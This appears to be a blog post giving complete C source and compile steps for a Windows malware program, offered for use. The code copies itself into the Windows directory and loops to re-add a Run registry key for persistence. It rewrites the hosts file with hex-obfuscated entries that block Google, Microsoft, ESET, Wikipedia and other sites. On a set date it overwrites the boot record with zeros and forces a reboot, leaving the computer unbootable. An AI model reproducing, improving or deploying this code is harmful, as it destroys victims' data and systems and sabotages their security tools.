Introduction
This overwrites the MBR with 0's making booting the computer impossible, tested on Windows 7 and Windows 8 + 8.1 = %100 success.
For windows 8 + 8.1 it does not require administrative privileges to use full effect, on windows 7 you must run as administrator.
How to Compile Code
Download Dev-Cpp: http://sourceforge.n...rror=netcologne
How to start the project:
1. File > New > Project
2. Select "Console Application"
3. Paste the "CODE"
Code
#include <Windows.h>
DWORD WINAPI CheckTime(){
DWORD write;
SYSTEMTIME st;
char data[512];
ZeroMemory(&data,sizeof(data));
GetLocalTime(&st);
//you can change the date of payload to occur.
if(st.wYear==2014){
HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
WriteFile(disk,data,512,&write,NULL);
CloseHandle(disk);
ExitWindowsEx(EWX_REBOOT,0);
}
return 0;
}
DWORD WINAPI hosts(){
char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
char path[60];
DWORD write;
GetEnvironmentVariable("windir",path,sizeof(path));
strcat(path,"\\system32\\drivers\\etc\\hosts");
HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
WriteFile(hFile,data,sizeof(data),&write,NULL);
CloseHandle(hFile);
return 0;
}
DWORD WINAPI reg(){
char value[]="Virus.exe";
HKEY hKey;
while(1){
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60);
RegCloseKey(hKey);
Sleep(10000);
}
return 0;
}
int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
char file[MAX_PATH];
char path[60];
HANDLE hToken;
LUID luid;
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
TOKEN_PRIVILEGES tp;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
GetModuleFileName(NULL,file,sizeof(file));
GetEnvironmentVariable("windir",path,60);
strcat(path,"\\Virus.exe");
CopyFile(file,path,false);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
while(1){
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
Sleep(10000);
}
return 0;
}
No comments:
Post a Comment